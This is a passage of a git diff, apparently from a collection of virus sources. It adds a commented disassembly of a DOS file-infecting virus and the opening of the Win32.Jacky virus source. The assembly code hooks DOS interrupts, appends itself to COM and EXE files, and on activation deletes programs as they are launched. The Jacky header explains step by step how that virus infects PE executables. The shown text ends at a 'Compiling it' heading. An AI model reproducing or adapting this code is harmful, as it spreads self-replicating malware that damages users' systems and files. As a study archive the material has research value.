BX,20h ;+512 ;92DA 83 C3 20 + and bx,0fff0h ;92DD 83 E3 F0 + MOV CS:L0033,BX ;paragrafy bloku potrzebne ;92E0 2E 89 1E 33 00 + MOV AH,4AH ;Set Block ;92E5 B4 4A + MOV ES,CS:L0031 ;segment bloku ;92E7 2E 8E 06 31 00 + INT 21H ;92EC CD 21 + MOV AX,3521h ;Get int 21h ;92EE B8 21 35 + INT 21H ;92F1 CD 21 + MOV CS:L0017,BX ;92F3 2E 89 1E 17 00 + MOV CS:L0019,ES ;92F8 2E 8C 06 19 00 + PUSH CS ;92FD 0E + POP DS ;92FE 1F + MOV DX,OFFSET L02D2 ;92FF BA D2 02 + MOV AX,2521h ;Set int 21h ;9302 B8 21 25 + INT 21H ;9305 CD 21 + MOV ES,[L0031] ;segment wirusa ;9307 8E 06 31 00 + MOV ES,ES:[2Ch] ;environment ;930B 26 8E 06 2C 00 + XOR DI,DI ;szukamy nazwy nosiciela ;9310 33 FF + MOV CX,7FFFh ;9312 B9 FF 7F + XOR AL,AL ;9315 32 C0 +L9317: REPNZ SCASB ;9317 F2 AE + CMP ES:[DI],AL ;9319 26 38 05 + LOOPNZ L9317 ;931C E0 F9 + MOV DX,DI ;pathname offset ;931E 8B D7 + ADD DX,3 ;9320 83 C2 03 + + MOV AX,4B00h ;Load & Execute nosiciela ;9323 B8 00 4B + PUSH ES ;9326 06 + POP DS ;pathname segment ;9327 1F + PUSH CS ;9328 0E + POP ES ;parameter block ;9329 07 + MOV BX,OFFSET L0035 ;parameter block ;932A BB 35 00 + PUSH DS ;932D 1E + PUSH ES ;932E 06 + PUSH AX ;932F 50 + PUSH BX ;9330 53 + PUSH CX ;9331 51 + PUSH DX ;9332 52 + MOV AH,2AH ;Get Date ;9333 B4 
2A + INT 21H ;9335 CD 21 + MOV BYTE PTR CS:L000E,0 ;ptr aktywnosci wirusa ;9337 2E C6 06 0E 00 00 + CMP CX,1989 ;rok ;933D 81 F9 C5 07 + JZ L936F ;-> tak ;9341 74 2C + +; Mistake! Range for AL is 0 ..6 ! + + CMP AL,7 ;niedziela ? ;9343 3C 07 + JNZ L9350 ;-> nie ;9345 75 09 + INC BYTE PTR CS:L000E ;ptr aktywnosci wirusa ;9347 2E FE 06 0E 00 + JMP SHORT L936F ;934C EB 21 + + NOP ;934E 90 + NOP ;934F 90 + + ;<- to nie niedziela i rok nie 1989 +L9350: MOV AX,3508h ;Get int 8 ;9350 B8 08 35 + INT 21H ;9353 CD 21 + MOV CS:L0013,BX ;9355 2E 89 1E 13 00 + MOV CS:L0015,ES ;935A 2E 8C 06 15 00 + PUSH CS ;935F 0E + POP DS ;9360 1F + MOV WORD PTR L001F,32400 ;30 minut ;9361 C7 06 1F 00 90 7E + MOV AX,2508h ;Set int 8 ;9367 B8 08 25 + MOV DX,OFFSET L0216 ;936A BA 16 02 + INT 21H ;936D CD 21 +L936F: POP DX ;936F 5A + POP CX ;9370 59 + POP BX ;9371 5B + POP AX ;9372 58 + POP ES ;9373 07 + POP DS ;9374 1F + PUSHF ;9375 9C + CALL DWORD PTR CS:L0017 ;old int 21h (run) ;9376 2E FF 1E 17 00 + PUSH DS ;937B 1E + POP ES ;937C 07 + MOV AH,49H ;Free allocated memory ;937D B4 49 + INT 21H ;937F CD 21 + MOV AH,4DH ;Get Return code of child proc ;9381 B4 4D + INT 21H ;9383 CD 21 + MOV AH,31H ;Keep process ;9385 B4 31 + MOV DX,OFFSET L065F ;adres konca ;9387 BA 5F 06 + MOV CL,4 ;na paragrafy ;938A B1 04 + SHR DX,CL ;938C D3 EA + ADD DX,10h ;zaokraglenie ;938E 83 C2 10 + INT 21H ;9391 CD 21 + +;----------------------------------------------- +; Wlasna obsluga int 24h +;----------------------------------------------- +L0213: XOR AX,AX ;9393 33 C0 + IRET ;9395 CF + +;================================================================ +; Nowa obsluga int 8 +;---------------------------------------------------------------- +L0216: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;9396 2E 80 3E 0E 00 01 + JNZ L93CC ;-> to nie sobota ;939C 75 2E + CMP WORD PTR CS:L001F,0 ;939E 2E 83 3E 1F 00 00 + JNZ L93C7 ;-> jeszcze mamy czas ;93A4 75 21 + PUSH AX ;93A6 50 + PUSH BX ;93A7 53 + PUSH SI ;93A8 56 + MOV 
AH,0EH ; ;93A9 B4 0E + MOV BL,1FH ;atrybut ;93AB B3 1F + LEA SI,L0251 ;'Today is SunDay...' ;93AD 8D 36 51 02 +L93B1: MOV AL,CS:[SI] ;znak ;93B1 2E 8A 04 + CMP AL,'$' ;koniec ? ;93B4 3C 24 + JZ L93BD ;-> tak ;93B6 74 05 + INT 10H ;93B8 CD 10 + INC SI ;93BA 46 + JMP SHORT L93B1 ;93BB EB F4 + +L93BD: MOV WORD PTR CS:L001F,32400 ;reset licznika na 30min;93BD 2E C7 06 1F 00 90 7E + POP SI ;93C4 5E + POP BX ;93C5 5B + POP AX ;93C6 58 +L93C7: DEC WORD PTR CS:L001F ;licznik zwloki ;93C7 2E FF 0E 1F 00 +L93CC: JMP DWORD PTR CS:L0013 ;oryginal int 8 ;93CC 2E FF 2E 13 00 + +L0251 DB 'Today is SunDay! Why do you work so hard?',LF,CR + DB 'All work and no play make you a dull boy!',LF,CR + DB "Come on ! Let's go out and have some fun!$" + +;================================================================ +; Nowa obsluga int 21h +;---------------------------------------------------------------- +L02D2: PUSHF ;9452 9C + CMP AH,0FFH ;czy to pytanie o wirusa ? ;9453 80 FC FF + JNZ L945D ;-> nie ;9456 75 05 + MOV AX,0400h ;sygnalizacja obecnosci ;9458 B8 00 04 + POPF ;945B 9D + IRET ;945C CF + +L945D: CMP AH,0DDH ;uruchomienie nosiciela COM ? ;945D 80 FC DD + JZ L9470 ;-> tak ;9460 74 0E + CMP AX,4B00h ;Load & Execute ? ;9462 3D 00 4B + JNZ L946A ;-> nie, przezroczystosc ;9465 75 03 + JMP SHORT L949E ;-> tak ;9467 EB 35 + + NOP ;9469 90 + +L946A: POPF ;946A 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;946B 2E FF 2E 17 00 + +L9470: POP AX ;<- 0DDh, uruchom nosiciela COM ;9470 58 + POP AX ;9471 58 + MOV AX,0100h ;IP ;9472 B8 00 01 + MOV CS:L000A,AX ;9475 2E A3 0A 00 + POP AX ;CS ;9479 58 + MOV CS:L000C,AX ;947A 2E A3 0C 00 + REPZ MOVSB ;przeslanie programu na wirusa ;947E F3 A4 + POPF ;9480 9D + MOV AX,CS:L000F ;? 
;9481 2E A1 0F 00 + JMP DWORD PTR CS:L000A ;9485 2E FF 2E 0A 00 + + ;<- uruchamianie programu w fazie aktywnosci +L948A: XOR CX,CX ;948A 33 C9 + MOV AX,4301h ;Set file attributes ;948C B8 01 43 + INT 21H ;948F CD 21 + MOV AH,41H ;Delete Directory Entry ;9491 B4 41 + INT 21H ;9493 CD 21 + MOV AX,4B00h ;Load & Execute ;9495 B8 00 4B + POPF ;9498 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;9499 2E FF 2E 17 00 + + ;<- uruchamianie programu +L949E: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;949E 2E 80 3E 0E 00 01 + JZ L948A ;-> aktywny ;94A4 74 E4 + MOV WORD PTR CS:L0070,0FFFFh ;File handle ;94A6 2E C7 06 70 00 FF FF + MOV WORD PTR CS:L008F,0 ;94AD 2E C7 06 8F 00 00 00 + MOV CS:L0080,DX ;path do programu ;94B4 2E 89 16 80 00 + MOV CS:L0082,DS ;94B9 2E 8C 1E 82 00 + PUSH AX ;94BE 50 + PUSH BX ;94BF 53 + PUSH CX ;94C0 51 + PUSH DX ;94C1 52 + PUSH SI ;94C2 56 + PUSH DI ;94C3 57 + PUSH DS ;94C4 1E + PUSH ES ;94C5 06 + CLD ;94C6 FC + MOV DI,DX ;94C7 8B FA + XOR DL,DL ;aktualny drive ;94C9 32 D2 + CMP BYTE PTR [DI+1],':' ;czy path z drive ? 
;94CB 80 7D 01 3A + JNZ L94D6 ;-> nie, aktualny ;94CF 75 05 + MOV DL,[DI] ;94D1 8A 15 + AND DL,1FH ;na numer drive ;94D3 80 E2 1F +L94D6: MOV AH,36H ;Get Disk Free Space ;94D6 B4 36 + INT 21H ;94D8 CD 21 + CMP AX,0FFFFh ;94DA 3D FF FF + JNZ L94E2 ;-> drive number OK ;94DD 75 03 +L94DF: JMP L9768 ;<- drive number invalid ;94DF E9 86 02 + +L94E2: MUL BX ;* ;94E2 F7 E3 + MUL CX ;* ;94E4 F7 E1 + OR DX,DX ;94E6 0B D2 + JNZ L94EF ;-> ponad 64 KB wolne ;94E8 75 05 + CMP AX,OFFSET L065F ;=1631=dlugosc wirusa ;94EA 3D 5F 06 + JB L94DF ;94ED 72 F0 +L94EF: MOV DX,CS:L0080 ;path do programu ;94EF 2E 8B 16 80 00 + PUSH DS ;94F4 1E + POP ES ;94F5 07 + XOR AL,AL ;poszukiwanie konca ;94F6 32 C0 + MOV CX,41h ;94F8 B9 41 00 + REPNZ SCASB ;94FB F2 AE + MOV SI,CS:L0080 ;zamiana na duze litery ;94FD 2E 8B 36 80 00 +L9502: MOV AL,[SI] ;9502 8A 04 + OR AL,AL ;9504 0A C0 + JZ L9516 ;9506 74 0E + CMP AL,61H ;'a' ;9508 3C 61 + JB L9513 ;950A 72 07 + CMP AL,7AH ;'z' ;950C 3C 7A + JA L9513 ;950E 77 03 + SUB BYTE PTR [SI],20H ;' ' ;9510 80 2C 20 +L9513: INC SI ;9513 46 + JMP SHORT L9502 ;9514 EB EC + +L9516: MOV CX,0Bh ;czy to command ? 
;9516 B9 0B 00 + SUB SI,CX ;9519 2B F1 + MOV DI,OFFSET L0084 ;'command.com' ;951B BF 84 00 + PUSH CS ;951E 0E + POP ES ;951F 07 + MOV CX,0Bh ;9520 B9 0B 00 + REPZ CMPSB ;9523 F3 A6 + JNZ L952A ;-> nie ;9525 75 03 + JMP L9768 ;-> tak, odpuszczamy ;9527 E9 3E 02 + +L952A: MOV AX,4300h ;Get File Attributes ;952A B8 00 43 + INT 21H ;952D CD 21 + JB L9536 ;952F 72 05 + MOV CS:L0072,CX ;atrybut zarazanego zbioru ;9531 2E 89 0E 72 00 +L9536: JB L955D ;9536 72 25 + XOR AL,AL ;znacznik zbioru COM ;9538 32 C0 + MOV CS:L004E,AL ;0=COM, 1=EXE ;953A 2E A2 4E 00 + PUSH DS ;szukamy konca nazwy ;953E 1E + POP ES ;953F 07 + MOV DI,DX ;9540 8B FA + MOV CX,41h ;9542 B9 41 00 + REPNZ SCASB ;9545 F2 AE + CMP BYTE PTR [DI-2],4DH ;'M'-ostatnia litera ;9547 80 7D FE 4D + JZ L9558 ;-> tak, COM ;954B 74 0B + CMP BYTE PTR [DI-2],6DH ;'m' ;954D 80 7D FE 6D + JZ L9558 ;-> tak, com ;9551 74 05 + INC BYTE PTR CS:L004E ;<- EXE ;9553 2E FE 06 4E 00 +L9558: MOV AX,3D00h ;Open Handle ;9558 B8 00 3D + INT 21H ;955B CD 21 +L955D: JB L95B9 ;955D 72 5A + MOV CS:L0070,AX ;File handle ;955F 2E A3 70 00 + MOV BX,AX ;9563 8B D8 + MOV AX,4202h ;Move file ptr EOF+offs ;9565 B8 02 42 + MOV CX,0FFFFh ;-5 (piec ostatnich bajtow) ;9568 B9 FF FF + MOV DX,0FFFBh ;956B BA FB FF + INT 21H ;956E CD 21 + JB L955D ;9570 72 EB + ADD AX,5 ;+5 bajtow sygnatury ;9572 05 05 00 + MOV CS:L0011,AX ;dlugosc programu oryginalna ;9575 2E A3 11 00 + MOV CX,5 ;dlugosc sygnatury ;9579 B9 05 00 + MOV DX,OFFSET L006B ;bufor na sygnature ;957C BA 6B 00 + MOV AX,CS ;957F 8C C8 + MOV DS,AX ;9581 8E D8 + MOV ES,AX ;9583 8E C0 + MOV AH,3FH ;Read Handle ;9585 B4 3F + INT 21H ;9587 CD 21 + MOV DI,DX ;przeczytana sygnatura ;9589 8B FA + MOV SI,OFFSET L0005 ;wzorzec sygnatury ;958B BE 05 00 + REPZ CMPSB ;958E F3 A6 + JNZ L9599 ;-> jeszcze nie zarazony ;9590 75 07 + MOV AH,3EH ;Close Handle ;9592 B4 3E + INT 21H ;9594 CD 21 + JMP L9768 ;9596 E9 CF 01 + + ;<----- zarazanie zbioru +L9599: MOV AX,3524h ;Get int 24h ;9599 B8 24 35 + INT 21H ;959C CD 
21 + MOV L001B,BX ;959E 89 1E 1B 00 + MOV L001D,ES ;95A2 8C 06 1D 00 + MOV DX,OFFSET L0213 ;L9393 ;95A6 BA 13 02 + MOV AX,2524h ;Set int 24h ;95A9 B8 24 25 + INT 21H ;95AC CD 21 + + LDS DX,DWORD PTR L0080 ;ptr na path ;95AE C5 16 80 00 + XOR CX,CX ;95B2 33 C9 + MOV AX,4301h ;Set File attributes ;95B4 B8 01 43 + INT 21H ;95B7 CD 21 +L95B9: JB L95F6 ;95B9 72 3B + MOV BX,CS:L0070 ;File handle ;95BB 2E 8B 1E 70 00 + MOV AH,3EH ;Close Handle ;95C0 B4 3E + INT 21H ;95C2 CD 21 + MOV WORD PTR CS:L0070,0FFFFh ;File handle ;95C4 2E C7 06 70 00 FF FF + MOV AX,3D02h ;Open Handle R/W ;95CB B8 02 3D + INT 21H ;95CE CD 21 + JB L95F6 ;95D0 72 24 + MOV CS:L0070,AX ;File handle ;95D2 2E A3 70 00 + MOV AX,CS ;95D6 8C C8 + MOV DS,AX ;95D8 8E D8 + MOV ES,AX ;95DA 8E C0 + MOV BX,L0070 ;File handle ;95DC 8B 1E 70 00 + MOV AX,5700h ;Get File Date/Time ;95E0 B8 00 57 + INT 21H ;95E3 CD 21 + MOV L0074,DX ;95E5 89 16 74 00 + MOV L0076,CX ;95E9 89 0E 76 00 + MOV AX,4200h ;Move file ptr BOF+offs ;95ED B8 00 42 + XOR CX,CX ;95F0 33 C9 + MOV DX,CX ;95F2 8B D1 + INT 21H ;95F4 CD 21 +L95F6: JB L9636 ;95F6 72 3E + CMP BYTE PTR L004E,0 ;0=COM, 1=EXE ;95F8 80 3E 4E 00 00 + JZ L9603 ;95FD 74 04 + JMP SHORT L965C ;95FF EB 5B + + NOP ;9601 90 + NOP ;9602 90 + + ;<----- Zarazenie COM'a +L9603: MOV BX,1000h ;zadanie 64KB bufora pamieci ;9603 BB 00 10 + MOV AH,48H ;allocate memory ;9606 B4 48 + INT 21H ;9608 CD 21 + JNB L9617 ;-> powiodlo sie ;960A 73 0B + MOV AH,3EH ;Close Handle ;960C B4 3E + MOV BX,L0070 ;File handle ;960E 8B 1E 70 00 + INT 21H ;9612 CD 21 + JMP L9768 ;9614 E9 51 01 + +L9617: INC WORD PTR L008F ;9617 FF 06 8F 00 + MOV ES,AX ;nowy blok pamieci ;961B 8E C0 + XOR SI,SI ;961D 33 F6 + MOV DI,SI ;961F 8B FE + MOV CX,OFFSET L065F ;9621 B9 5F 06 + REPZ MOVSB ;przepisanie do bufora ;9624 F3 A4 + + MOV DX,DI ;pierwsze wolne miejsce ;9626 8B D7 + MOV CX,L0011 ;dlugosc programu oryginalna ;9628 8B 0E 11 00 + MOV BX,L0070 ;File handle ;962C 8B 1E 70 00 + PUSH ES ;9630 06 + POP DS ;9631 1F + MOV 
AH,3FH ;Read Handle ;9632 B4 3F + INT 21H ;9634 CD 21 +L9636: JB L9657 ;9636 72 1F + ADD DI,CX ;na poczatek zbioru ;9638 03 F9 + XOR CX,CX ;963A 33 C9 + MOV DX,CX ;963C 8B D1 + MOV AX,4200h ;Move file ptr BOF+offs ;963E B8 00 42 + INT 21H ;9641 CD 21 + MOV SI,OFFSET L0005 ;dopisanie ogonka ;9643 BE 05 00 + MOV CX,5 ;9646 B9 05 00 + PUSH DS ;9649 1E + PUSH CS ;964A 0E + POP DS ;964B 1F + REPZ MOVSB ;964C F3 A4 + POP DS ;964E 1F + MOV CX,DI ;nowa dlugosc programu ;964F 8B CF + XOR DX,DX ;bufor z wynikowym programem ;9651 33 D2 + MOV AH,40H ;Write Handle ;9653 B4 40 + INT 21H ;9655 CD 21 +L9657: JB L9666 ;9657 72 0D + JMP L9723 ;9659 E9 C7 00 + + ;<----- Zarazenie EXE'ca +L965C: MOV CX,1Ch ;EXE file header - dlugosc ;965C B9 1C 00 + MOV DX,OFFSET L004F ; - bufor ;965F BA 4F 00 + MOV AH,3FH ;Read Handle ;9662 B4 3F + INT 21H ;9664 CD 21 +L9666: JB L96B2 ;9666 72 4A + MOV WORD PTR L0061,1984h ;suma kontrolna ;9668 C7 06 61 00 84 19 + MOV AX,L005D ;SS ;966E A1 5D 00 + MOV L0045,AX ;9671 A3 45 00 + MOV AX,L005F ;SP ;9674 A1 5F 00 + MOV L0043,AX ;9677 A3 43 00 + MOV AX,L0063 ;IP ;967A A1 63 00 + MOV L0047,AX ;967D A3 47 00 + MOV AX,L0065 ;CS ;9680 A1 65 00 + MOV L0049,AX ;9683 A3 49 00 + MOV AX,L0053 ;sile size - pages ;9686 A1 53 00 + CMP WORD PTR L0051,0 ;last page bytes ;9689 83 3E 51 00 00 + JZ L9691 ;968E 74 01 + DEC AX ;9690 48 +L9691: MUL WORD PTR L0078 ;* ;9691 F7 26 78 00 + ADD AX,L0051 ;+last page bytes ;9695 03 06 51 00 + ADC DX,0 ;9699 83 D2 00 + ADD AX,0Fh ;zaokraglenie ;969C 05 0F 00 + ADC DX,0 ;969F 83 D2 00 + AND AX,0FFF0h ;96A2 25 F0 FF + MOV L007C,AX ;96A5 A3 7C 00 + MOV L007E,DX ;96A8 89 16 7E 00 + ADD AX,OFFSET L0664 ;dlugosc z sygnatura ;96AC 05 64 06 + ADC DX,0 ;96AF 83 D2 00 +L96B2: JB L96EE ;96B2 72 3A + DIV WORD PTR L0078 ;bytes per page ;96B4 F7 36 78 00 + OR DX,DX ;czy jest reszta ? 
;96B8 0B D2 + JZ L96BD ;-> nie ;96BA 74 01 + INC AX ;<- jest reszta ;96BC 40 +L96BD: MOV L0053,AX ;pages per file ;96BD A3 53 00 + MOV L0051,DX ;last page bytes ;96C0 89 16 51 00 + MOV AX,L007C ;nowa dlugosc calosci ;96C4 A1 7C 00 + MOV DX,L007E ;96C7 8B 16 7E 00 + DIV WORD PTR L007A ;na paragrafy ;96CB F7 36 7A 00 + SUB AX,L0057 ;header size ;96CF 2B 06 57 00 + MOV L0065,AX ;CS wirusa ;96D3 A3 65 00 + MOV WORD PTR L0063,OFFSET L00C4 ;IP wirusa ;96D6 C7 06 63 00 C4 00 + MOV L005D,AX ;SS wirusa ;96DC A3 5D 00 + MOV WORD PTR L005F,OFFSET L065D ;SP wirusa ;96DF C7 06 5F 00 5D 06 + XOR CX,CX ;96E5 33 C9 + MOV DX,CX ;96E7 8B D1 + MOV AX,4200h ;Move file ptr BOF+offs ;96E9 B8 00 42 + INT 21H ;96EC CD 21 +L96EE: JB L96FA ;96EE 72 0A + MOV CX,1Ch ;zapis zmodyf. headera ;96F0 B9 1C 00 + MOV DX,OFFSET L004F ;96F3 BA 4F 00 + MOV AH,40H ;write handle ;96F6 B4 40 + INT 21H ;96F8 CD 21 +L96FA: JB L970D ;96FA 72 11 + CMP AX,CX ;96FC 3B C1 + JNZ L9723 ;-> nie cale poszlo ;96FE 75 23 + MOV DX,L007C ;nowa dlugosc zbioru ;9700 8B 16 7C 00 + MOV CX,L007E ;9704 8B 0E 7E 00 + MOV AX,4200h ;Move file ptr BOF+offs ;9708 B8 00 42 + INT 21H ;970B CD 21 +L970D: JB L9723 ;970D 72 14 + XOR DX,DX ;970F 33 D2 + MOV CX,065Fh ;9711 B9 5F 06 + MOV AH,40H ;Write Handle ;9714 B4 40 + INT 21H ;9716 CD 21 + MOV CX,5 ;9718 B9 05 00 + LEA DX,L0005 ;971B 8D 16 05 00 + MOV AH,40H ;Write Handle ;971F B4 40 + INT 21H ;9721 CD 21 + + ;<----- wspolny koniec +L9723: CMP WORD PTR CS:L008F,0 ;znacznik zajecia bloku ;9723 2E 83 3E 8F 00 00 + JZ L972F ;9729 74 04 + MOV AH,49H ;Free allocated memory ;972B B4 49 + INT 21H ;972D CD 21 +L972F: CMP WORD PTR CS:L0070,-1 ;File handle ;972F 2E 83 3E 70 00 FF + JZ L9768 ;-> nie otwarty ;9735 74 31 + MOV BX,CS:L0070 ;File handle ;9737 2E 8B 1E 70 00 + MOV DX,CS:L0074 ;973C 2E 8B 16 74 00 + MOV CX,CS:L0076 ;9741 2E 8B 0E 76 00 + MOV AX,5701h ;Set File Time/Date ;9746 B8 01 57 + INT 21H ;9749 CD 21 + MOV AH,3EH ;Close Handle ;974B B4 3E + INT 21H ;974D CD 21 + PUSH CS ;974F 0E 
+ POP DS ;9750 1F
+ LDS DX,DWORD PTR L0080 ;ptr nazwy zbioru ;9751 C5 16 80 00
+ MOV CX,CS:L0072 ;atry zarazanego zbioru ;9755 2E 8B 0E 72 00
+ MOV AX,4301h ;Set File Attributes ;975A B8 01 43
+ INT 21H ;975D CD 21
+ LEA DX,L001B ;975F 8D 16 1B 00
+ MOV AX,2524h ;Set int 24h vector ;9763 B8 24 25
+ INT 21H ;9766 CD 21
+L9768: POP ES ;9768 07
+ POP DS ;9769 1F
+ POP DI ;976A 5F
+ POP SI ;976B 5E
+ POP DX ;976C 5A
+ POP CX ;976D 59
+ POP BX ;976E 5B
+ POP AX ;976F 58
+ POPF ;9770 9D
+ JMP DWORD PTR CS:L0017 ;old int 21h ;9771 2E FF 2E 17 00
+
+L05F6 dw 03FCh ;<- adres wektora int ff ;9776 FC 03
+ dw 0 ;9778 00 00
+
+ ;<------ stos
+ db 0 ;977A 00
+
+ dw 0 ;977B 00 00
+ dw 0 ;977D 00 00
+ dw 0 ;977F 00 00
+ dw 0 ;9781 00 00
+ dw 0 ;9783 00 00
+ dw 0 ;9785 00 00
+ dw 0 ;9787 00 00
+ dw 0 ;9789 00 00
+ dw 0 ;978B 00 00
+ dw 0 ;978D 00 00
+ dw 0 ;978F 00 00
+ dw 0 ;9791 00 00
+ dw 0 ;9793 00 00
+ dw 0 ;9795 00 00
+ dw 0 ;9797 00 00
+ dw 0 ;9799 00 00
+ dw 0 ;979B 00 00
+ dw 0 ;979D 00 00
+ dw 0 ;979F 00 00
+ dw 0 ;97A1 00 00
+ dw 0 ;97A3 00 00
+ dw 0 ;97A5 00 00
+ dw 0 ;97A7 00 00
+ dw 156Ch ;97A9 6C 15
+ dw 1261h ;97AB 61 12
+ dw 2524h ;97AD 24 25
+ dw 0005h ;97AF 05 00
+ dw 0020h ;97B1 20 00
+ dw 04EBh ;97B3 EB 04
+ dw 0006h ;97B5 06 00
+ dw 156Ch ;97B7 6C 15
+ dw 2508h ;97B9 08 25
+ dw 0FEA5h ;97BB A5 FE
+ dw 07BCh ;97BD BC 07
+ dw 0216h ;97BF 16 02
+ dw 065Eh ;97C1 5E 06
+ dw 156Ch ;97C3 6C 15
+ dw 0C89h ;97C5 89 0C
+ dw 012Fh ;97C7 2F 01
+ dw 7F04h ;97C9 04 7F
+ dw 0075h ;97CB 75 00
+ dw 065Eh ;97CD 5E 06
+ dw 5A1Dh ;97CF 1D 5A
+ dw 0 ;97D1 00 00
+ dw 9301h ;97D3 01 93
+ dw 0BA6h ;97D5 A6 0B
+ dw 0213h ;97D7 13 02
+ dw 0C89h ;97D9 89 0C
+ dw 0F202h ;97DB 02 F2
+L065D dw 2700h ;szczyt stosu ;97DD 00 27
+
+L065F DB 0C8H,0F7h,0E1h,0EEh,0E7h ;97DF C8 F7 E1 EE E7
+L0664 label byte
+S9180 ENDS
+
+ END L9244
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.jacky.asm b/MSDOS/Virus.MSDOS.Unknown.jacky.asm
new file mode 100644
index 00000000..ccd07dbb
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.jacky.asm 
@@ -0,0 +1,1148 @@ +; +; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ +; Win32.Jacky.1440 ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ +; by Jacky Qwerty/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ +; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ +; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ +; +; Hello ppl, welcome to the first "Winblowz" 95/NT fully compatible virus. +; Yea i didnt mistype above, it reads "Win32" not "Win95" coz this babe is +; really a "genuine" Win32 virus, which means it should be able to infect +; any Win32 based system: Windoze 95, Windoze NT or Win32s. For some known +; reasonz that i wont delve in detail here, previous Win95 virusez were una- +; ble to spread succesfully under NT. The main reasonz were becoz they asu- +; med KERNEL32 bein loaded at a fixed base adress (not true for NT or even +; future Win95 updatez) and they also made a "guess" about where the Win32 +; API functionz were located inside the KERNEL32 itself. +; +; This virus does NOT rely on fixed memory positionz or absolute adressez in +; order to run and spread. It always works at the Win32 API level, not play- +; in its trickz "under the hood". This proves enough for the virus to spread +; succesfully on NT, asumin the user has enough rightz, of course. +; +; Unfortunately, this virus didnt make it as the first Windoze NT virus for +; the media. AVerz said they didnt have an NT machine available for virus +; testin, so they simply didnt test it under NT. Well ehem, thats what they +; said #8S. In the past summer however i finished the codin of Win32.Cabanas +; which is a far superior virus with much more featurez than its predecesor. +; This time, the guyz from Datafellowz and AVP made serious testz with Caba- +; nas under NT until they finally concluded: "Oh miracle! it is able to work +; under NT!". So acordin to the media, Win32.Cabanas is the first WinNT vi- +; rus and not Win32.Jacky as it should have been. Anywayz.. 
+; +; +; Technical description +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; When Win32.Jacky executes, it first looks for KERNEL32 base adress usin +; the GetModuleHandleA API right from the host import table and then it re- +; trieves all other file API function adressez by usin the GetProcAdress API +; also from the import table. These APIz are not inserted by the virus when +; infection, they are only used if they already existed there (very likely), +; but this is not a "must do" for the virus to work tho. After all Win32 API +; functionz needed by the virus have been located, it looks for PE (EXE) fi- +; lez in the current directory and infects them one by one. +; +; When infection starts, each EXE file is opened and maped in shared memory +; usin the "file mapin" API functionz provided by KERNEL32. This proves to +; be a great advance regardin file functionz as it clearly simplifies to a +; large extent the infection process and file handlin in general. After the +; PE signature is detected from the maped file, the virus inspects its im- +; port table lookin for the GetModuleHandleA and GetProcAddress APIz inside +; the KERNEL32 import descriptor. If this module is not imported, the file +; is left alone and discarded. If the GetProcAddress API is not found, the +; virus (later on when it executes) will call its own internal GetProcAd- +; dressET function, which simply inspects the KERNEL32 export table lookin +; for any specified Win32 API function. If GetModuleHandleA is not found the +; file will still get infected but then the virus, in order to find the KER- +; NEL32 base adress, will be relyin on a smoewhat undocumented feature (che- +; cked before use). This feature is very simple: whenever a PE file with un- +; bound KERNEL32 function adressez is loaded, the Win95 loader puts the KER- +; NEL32 adress in the ForwarderChain field of the KERNEL32 import descrip- +; tor. 
This also works in Win95 OSR2 version but doesnt work on WinNT tho, +; so it should be used with some care after makin some sanity checkz first. +; +; If the GetModuleHandleA and GetProcAddrss APIz are found, the virus will +; hardcode their IAT referencez inside the virus code, then later on when +; the virus executes, it will have these API referencez already waitin to be +; called by the installation code. After the latter API search is done, the +; virus copies itself to the last section in the file, modifies the section +; atributez to acomodate the virus code and finally changes the EntryPoint +; field in the PE header to point to the virus code. The virus doesnt change +; or modify the time/date stamp of infected filez nor it is stoped by the +; "read only" atribute. +; +; +; AVP description +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Before jumpin to the source code, lets read what AVP has to say about the +; virus. Unfortunately as u will see they didnt test the thing on NT, other- +; wise they would have had a big surprise with it hehe #8D +; +; (*) Win95.Jacky - http://www.avp.ch/avpve/newexe/win95/jacky.stm * +; +;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 +; It is a harmless nonmemory resident parasitic Win95/NT virus 1440 +; bytes of length. Being executed the virus scans Win95/NT kernel and +; gets undocumented addresses of system file access function (see the +; list below). Then it searches for NewEXE Portable Executable +; (Win95 and NT) files and writes itself to the end of the file. The +; virus aligns the file length to the section, so the file lengths +; grows more that 1440 bytes while infection. +; +; This is the first known Win95/NT parasitic virus that does not add +; new section to the file - while infecting a file the virus writes +; itself to the end of the file, increases the size of last section +; in the file, and modifies characteristics of this section. 
So, +; only entry point address, size and characteristics of last section +; are modified in infected files. +; +; This is also first known to me Win95/NT infector that did work on +; my test computer (Windows95) without any problem. I did not try it +; under NT. +; +; The virus contains the encrypted strings, a part of these strings +; are the names of system functions that are used during infection: +; +; KERNEL32 GetModuleHandleA GetProcAddress +; *.EXE +; CreateFileA CreateFileMappingA CloseHandle UnmapViewOfFile +; MapViewOfFile FindFirstFileA FindNextFileA FindClose +; SetFileAttributesA SetFilePointer SetEndOfFile SetFileTime +; +; To My d34d fRi3nD c4b4n4s.. +; A Win/NT/95 ViRuS v1.00. +; By: j4cKy Qw3rTy / 29A. +; jqw3rty@cryogen.com +;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 +; +; +; Greetingz +; ÄÄÄÄÄÄÄÄÄ +; And finaly the greetinz go to: +; +; Mr.Chan, Wai ......... Thx for your help and advice.. master! +; MrSandman/29A ........ erm.. when will 29A#2 go out? hehe ;) +; QuantumG ............. What about yer NT resident driver idea? +; DarkSide1 ............ We are Southamerican rockerzzz! +; GriYo/29A ............ Implant poly rulez! +; +; +; Disclaimer +; ÄÄÄÄÄÄÄÄÄÄ +; This source code is for educational purposez only. The author is not res- +; ponsible for any problemz caused due to the assembly of this file. +; +; +; Compiling it +; ÄÄÄÄÄÄÄÄÄÄÄÄ +; 